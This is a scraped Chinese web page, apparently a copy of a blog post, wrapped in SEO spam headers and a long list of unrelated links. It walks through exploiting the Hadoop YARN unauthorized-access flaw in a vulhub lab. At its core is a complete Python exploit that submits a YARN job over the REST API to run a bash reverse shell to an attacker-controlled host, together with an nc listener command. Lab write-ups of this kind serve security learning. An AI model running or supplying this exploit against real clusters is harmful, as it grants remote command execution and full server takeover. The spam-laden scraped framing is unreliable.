当前位置: 首页 > news >正文

做两性网站一级域名二级域名三级域名的区别

做两性网站,一级域名二级域名三级域名的区别,网站用户注册页面怎么做,wordpress 几天前数据库安全:Hadoop 未授权访问-命令执行漏洞. Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完…

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问主要是因为 Hadoop YARN 资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过 RESTAPI 部署任务来执行任意指令,最终完全控制服务器。


目录:

数据库安全:Hadoop 未授权访问-命令执行漏洞.

Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

Hadoop 未授权访问-命令执行漏洞测试:


Hadoop 未授权访问-命令执行漏洞:

开启 vulhub 靶场环境:

 第一步:切换到 vulhub 目录下

cd vulhub


第二步:切换到 hadoop 目录下

cd hadoop


第三步:切换到 unauthorized-yarn 漏洞目录下.


第四步:开启 漏洞 服务.

docker-compose up -d


第五步:访问  http:// (靶场 IP 地址):8088


   

Hadoop 未授权访问-命令执行漏洞测试:

第一步:访问 /cluster/apps 页面【如果 该页面存在的话,说明存在未授权访问漏洞】

http://192.168.0.106:8088/cluster/apps


第二步:在 攻击机(kali)设置监听.

nc -nvlp 8888// 设置 监听 端口为8888


第三步:编写 Python 执行代码.

import requestsdef shell(url,vps_ip,port):headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}response = requests.post(url+"/ws/v1/cluster/apps/new-application",headers=headers)id = response.json()["application-id"]data = {'application-id': id,'application-name': 'getshell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/%s 0>&1'%(vps_ip,port)},},'application-type': 'YARN'}exploit = requests.post(url+"/ws/v1/cluster/apps",headers=headers,json=data)print("[+] 执行完成!")if __name__ == '__main__':url = input("目标的URL:")vps_ip = input("监听的主机IP地址(kali):")port = input("监听的主机端口(kali):")shell(url,vps_ip,port)

执行代码:


第四步:返回 监听的主机查看结果,发现已经成功.


    

     

     

参考文章:Hadoop 漏洞复现_hadoop命令执行漏洞-CSDN博客

学习链接:第55天:服务攻防-数据库安全_Redis_Hadoop_Mysql_未授权访问_RCE_哔哩哔哩_bilibili

http://www.fp688.cn/news/161625.html

相关文章:

  • 做网站的图片分类微信广告
  • 政府网站手机网站建设seo专业培训费用
  • 武汉网站建设哪家好网络推广要求
  • 自做跨境电商网站收款武汉网站优化公司
  • 西安社动网站建设seo需要培训才能找到工作吗
  • 如何做电视剧的短视频网站百度推广图片尺寸要求
  • 黄村做网站的公司seo关键词是什么
  • 男女做那个网站游戏代理平台一天结一次
  • 上海专业高端网站建设服商城全网推广运营公司
  • 做篮球管理网站的步骤学it学费大概多少钱
  • java做网站和asp做网站百度站长中心
  • 网站建设找北冥有鱼今日热搜新闻头条
  • 重庆企业网站制作哪家好百度广告业务
  • 网站建设的目的写软文怎么接单子
  • 做神马网站优化排名软百度惠生活商家入驻
  • 织梦网站装修公司源码谷歌搜索排名
  • 武汉制作网站的公司网络安全培训最强的机构
  • 网络培训网站成都关键词优化平台
  • 百度推广进入后是别的网站 说是服务器问题网站优化 秦皇岛
  • 用html做家谱网站代码免费游戏推广平台
  • 天津企业网站开发百度提交网站收录查询
  • 大连公司电话优化疫情二十条措施
  • h5商城网站是什么海外域名
  • 黄冈网页设计北京百度seo价格
  • 展览公司网站建设制作小程序的软件
  • 备案后修改网站名称深圳网络推广哪家比较好
  • 深圳比较大的贸易进口公司windows优化大师会员兑换码
  • 做优惠券网站如何引流网站seo诊断报告怎么写
  • 用阿里云服务器做盗版小说网站吗百度竞价推广开户联系方式
  • wordpress能大网站主题本地广告推广平台哪个好